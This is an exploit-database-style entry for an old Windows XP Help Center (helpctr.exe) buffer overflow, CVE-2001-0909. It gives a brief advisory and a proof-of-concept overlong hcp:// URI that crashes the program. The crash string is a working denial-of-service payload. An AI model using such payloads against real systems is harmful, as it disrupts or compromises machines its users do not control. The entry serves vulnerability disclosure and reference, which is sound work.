Microsoft Windows XP - HCP URI Buffer Overflow

Author: mozoral
type: dos
platform: windows
port: 
date_added: 2001-11-21 
date_updated: 2012-10-25 
verified: 1 
codes: CVE-2001-0909;OSVDB-13987 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/6802/info

A buffer overrun vulnerability was reported for helpctr.exe. The vulnerability exists due to insufficient bounds checking on input supplied via the HCP URI parameter.

An attacker can exploit this vulnerability by making a HCP request with an overly long string. This will trigger the overflow condition and may result in malicious attacker-supplied code being executed on the vulnerable system.

hcp://m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.
m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m.m